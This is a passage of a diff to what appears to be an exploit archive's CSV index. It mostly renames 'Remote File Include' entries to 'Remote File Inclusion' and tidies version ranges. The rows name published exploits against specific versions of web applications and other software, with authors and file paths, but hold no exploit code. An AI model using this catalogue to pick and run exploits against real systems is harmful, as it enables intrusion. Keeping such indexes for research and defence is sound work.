+28615,platforms/asp/webapps/28615.txt,"DotNetNuke 4.0 HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 Choix_langue.php Directory Traversal",2006-09-20,cdg393,php,webapps,0 28617,platforms/php/webapps/28617.txt,"Grayscale BandSite CMS 1.1 help_news.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28618,platforms/php/webapps/28618.txt,"Grayscale BandSite CMS 1.1 help_merch.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -25720,8 +25720,8 @@ id,file,description,date,author,platform,type,port 28669,platforms/php/webapps/28669.txt,"BirdBlog 1.x user.php uid Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 index.php page Parameter XSS",2006-09-25,You_You,php,webapps,0 28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 admin.php do Parameter XSS",2006-09-25,You_You,php,webapps,0 -28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 Index2.php Remote File Include",2006-09-25,Root3r_H3ll,php,webapps,0 -28673,platforms/php/webapps/28673.txt,"Exporia 0.3 Common.php Remote File Include",2006-09-25,Root3r_H3ll,php,webapps,0 +28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 Index2.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28673,platforms/php/webapps/28673.txt,"Exporia 0.3 Common.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -25734,21 +25734,21 @@ id,file,description,date,author,platform,type,port 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 -28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.php Remote File Include",2006-09-25,Root3r_H3ll,php,webapps,0 +28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28687,platforms/php/webapps/28687.txt,"php_news 2.0 user_user.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28688,platforms/php/webapps/28688.txt,"php_news 2.0 admin/news.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28689,platforms/php/webapps/28689.txt,"php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28690,platforms/php/webapps/28690.txt,"php_news 2.0 creat_news_all.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Include",2006-09-25,You_You,php,webapps,0 +28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,php,webapps,0 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS index.php Multiple Parameter XSS",2006-09-26,Root3r_H3ll,php,webapps,0 28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS modules/pageedit/index.php pageid Parameter XSS",2006-09-26,Root3r_H3ll,php,webapps,0 28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - /admin/nav.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - /admin/image.php image Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 -28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 +28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Inclusion Vulnerabilities",2006-09-30,xoron,php,webapps,0 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 -28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 +28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion Vulnerabilities",2006-09-28,D_7J,php,webapps,0 28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28732,platforms/php/webapps/28732.txt,"Yblog funk.php id Parameter XSS",2006-09-30,You_You,php,webapps,0 28733,platforms/php/webapps/28733.txt,"Yblog tem.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 @@ -25756,26 +25756,26 @@ id,file,description,date,author,platform,type,port 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection",2006-12-11,ajann,asp,webapps,0 -28728,platforms/php/webapps/28728.txt,"Geotarget Script.php Remote File Include",2006-09-29,"RaVeR shi mozi",php,webapps,0 +28728,platforms/php/webapps/28728.txt,"Geotarget Script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",osx,remote,0 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 Home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 -28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.php3 - Remote File Include",2006-09-27,rUnViRuS,php,webapps,0 +28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.php3 - Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0 28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 -28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.php Remote File Include",2006-09-27,ThE-WoLf-KsA,php,webapps,0 +28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.php Remote File Inclusion",2006-09-27,ThE-WoLf-KsA,php,webapps,0 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution",2013-10-04,Metasploit,windows,remote,0 -28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 Sig.php Remote File Include",2006-10-02,r0ut3r,php,webapps,0 -28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.php Remote File Include",2006-10-02,"abu ahmed",php,webapps,0 +28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 Sig.php Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 +28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.php Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 Cart.php Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 Template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 @@ -25796,7 +25796,7 @@ id,file,description,date,author,platform,type,port 28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 admin/tax_rates.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 admin/zones.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28760,platforms/php/remote/28760.php,"PHP 3-5 ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0 -28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x Index.php Remote File Include",2006-10-05,MoHaNdKo,php,webapps,0 +28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x Index.php Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica Display.ASP SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28763,platforms/windows/local/28763.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (1)",2006-08-26,"Ruben Santamarta ",windows,local,0 28764,platforms/windows/local/28764.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (2)",2006-08-26,"Ruben Santamarta ",windows,local,0 @@ -25806,40 +25806,40 @@ id,file,description,date,author,platform,type,port 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 Uyegiris.ASP SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind Index.php Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module SQL Injection",2006-10-08,disfigure,php,webapps,0 -28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 Functions.inc.php Remote File Include",2006-10-08,ThE-WoLf-KsA,php,webapps,0 -28772,platforms/php/webapps/28772.txt,"ISearch 2.16 ISEARCH_PATH Parameter Remote File Include",2006-10-09,MoHaNdKo,php,webapps,0 -28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 Index.php Remote File Include",2006-10-09,Crackers_Child,php,webapps,0 -28774,platforms/php/webapps/28774.txt,"PHPWebSite 0.10.2 PHPWS_SOURCE_DIR Parameter Multiple Remote File Include Vulnerabilities",2006-10-09,Crackers_Child,php,webapps,0 +28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 Functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +28772,platforms/php/webapps/28772.txt,"ISearch 2.16 ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 +28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 Index.php Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 +28774,platforms/php/webapps/28774.txt,"PHPWebSite 0.10.2 PHPWS_SOURCE_DIR Parameter Multiple Remote File Inclusion Vulnerabilities",2006-10-09,Crackers_Child,php,webapps,0 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 -28778,platforms/php/webapps/28778.txt,"ironwebmail <= 6.1.1 - Directory Traversal information disclosure",2006-10-16,"Derek Callaway",php,webapps,0 -28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.php Remote File Include",2006-10-10,DarkFig,php,webapps,0 -28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.php Remote File Include Vulnerabilities",2006-10-10,k1tk4t,php,webapps,0 -28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.php Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -28782,platforms/php/webapps/28782.txt,"Tagit2b DelTagUser.php Remote File Include",2006-10-10,k1tk4t,php,webapps,0 +28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal information disclosure",2006-10-16,"Derek Callaway",php,webapps,0 +28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.php Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.php Remote File Inclusion Vulnerabilities",2006-10-10,k1tk4t,php,webapps,0 +28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +28782,platforms/php/webapps/28782.txt,"Tagit2b DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 SQL.php Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 -28784,platforms/php/webapps/28784.txt,"Gcards 1.13 Addnews.php Remote File Include",2006-10-11,"DeatH VirUs",php,webapps,0 +28784,platforms/php/webapps/28784.txt,"Gcards 1.13 Addnews.php Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (beta) - KML/KMZ Files Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 -28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 Bug.php Remote File Include",2006-10-11,"Nima Salehi",php,webapps,0 -28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Includes Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 +28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 Bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 +28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 28788,platforms/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 28789,platforms/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",solaris,local,0 28790,platforms/php/webapps/28790.txt,"PHPList 2.x Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 -28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b Config.php Remote File Include",2006-10-12,"Le CoPrA",php,webapps,0 +28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b Config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - Details.php Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 Upload.php Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0 -28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full Archive_Topic.php Remote File Include",2006-09-29,"Nima Salehi",php,webapps,0 +28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full Archive_Topic.php Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0 28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - index.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 -28803,platforms/php/webapps/28803.txt,"Xoops <= 2.2.3 - Search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0 -28804,platforms/php/webapps/28804.pl,"PHPBB Add Name Module Not_Mem.php Remote File Include",2006-10-13,"Nima Salehi",php,webapps,0 +28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - Search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0 +28804,platforms/php/webapps/28804.pl,"PHPBB Add Name Module Not_Mem.php Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - (.ico) Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation Exploit",2013-10-08,"Lorenzo Cantoni",linux,local,0 @@ -25850,31 +25850,31 @@ id,file,description,date,author,platform,type,port 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 -28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.php Remote File Include",2006-10-13,"Le CoPrA",php,webapps,0 +28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x WebShell Login.php Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 = ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0 -28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 HTMLTemplate.php Remote File Include",2006-10-16,The_BeKiR,php,webapps,0 -28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.php Remote File Include",2006-10-17,The_BeKiR,php,webapps,0 +28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 +28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 Index.php Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 -28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.php Remote File Include",2006-10-16,ERNE,php,webapps,0 +28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 Edit User HTML Injection",2006-10-16,MP,php,webapps,0 28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 Index.php Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 Index.php Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 -28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Include Vulnerabilities",2006-10-18,Matdhule,php,webapps,0 -28828,platforms/php/webapps/28828.txt,"Zorum 3.5 DBProperty.php Remote File Include",2006-10-19,MoHaNdKo,php,webapps,0 +28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusion Vulnerabilities",2006-10-18,Matdhule,php,webapps,0 +28828,platforms/php/webapps/28828.txt,"Zorum 3.5 DBProperty.php Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0 28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System Index.ASP SQL Injection",2006-10-18,fireboy,asp,webapps,0 -28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 Index.php Remote File Include",2006-10-19,"Alireza Ahari",php,webapps,0 +28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 Index.php Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum 1.0/1.1 Index.php Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 -28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Include Vulnerabilities",2006-10-19,SuBzErO,php,webapps,0 +28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion Vulnerabilities",2006-10-19,SuBzErO,php,webapps,0 28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 Config.php SQL Injection",2006-10-20,G1UK,php,webapps,0 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP CMD.EXE Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0 28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0 28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote,0 28837,platforms/novell/remote/28837.rb,"Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow (3)",2006-10-30,MC,novell,remote,0 -28838,platforms/php/webapps/28838.txt,"ClanLite Config-PHP.php Remote File Include",2006-10-23,x_w0x,php,webapps,0 +28838,platforms/php/webapps/28838.txt,"ClanLite Config-PHP.php Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter XSS",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28841,platforms/php/webapps/28841.txt,"RMSOFT Gallery System 2.0 Images.php Cross-Site Scripting",2006-10-23,FREAK_PR,php,webapps,0 @@ -25887,7 +25887,7 @@ id,file,description,date,author,platform,type,port 28848,platforms/hardware/remote/28848.txt,"INCA IM-204 Information Disclosure",2006-10-23,Crackers_Child,hardware,remote,0 28849,platforms/windows/remote/28849.txt,"Cruiseworks 1.09 Cws.EXE Doc Directory Traversal",2006-10-24,"Tan Chew Keong",windows,remote,0 28850,platforms/windows/remote/28850.txt,"Cruiseworks 1.09 Cws.exe Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",windows,remote,0 -28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Include Vulnerabilities",2006-10-24,Crackers_Child,php,webapps,0 +28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusion Vulnerabilities",2006-10-24,Crackers_Child,php,webapps,0 28852,platforms/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",hardware,dos,80 28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX - Buffer Overflow",2013-10-10,blake,windows,remote,0 28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0 @@ -25896,21 +25896,21 @@ id,file,description,date,author,platform,type,port 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x admin/index.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x admin/pwlost.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 MKD Command Remote Overflow DoS",2006-10-24,"Federico Fazzi",windows,dos,0 -28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 PathToComment Parameter Remote File Include",2006-10-25,"Cold Zero",php,webapps,0 -28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 Init.php Remote File Include",2006-10-25,The-0utl4w,php,webapps,0 +28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 +28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 User.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 28864,platforms/php/webapps/28864.txt,"PhpLeague 0.81 consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 -28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 TreeViewClass.php Remote File Include",2006-10-27,"Prince Islam",php,webapps,0 +28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0 28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 Dir.php Directory Traversal",2006-10-27,Christopher,php,webapps,0 -28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 Bannieres.php Remote File Include",2006-10-27,Mahmood_ali,php,webapps,0 +28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 Bannieres.php Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x Search.ASP SQL Injection",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 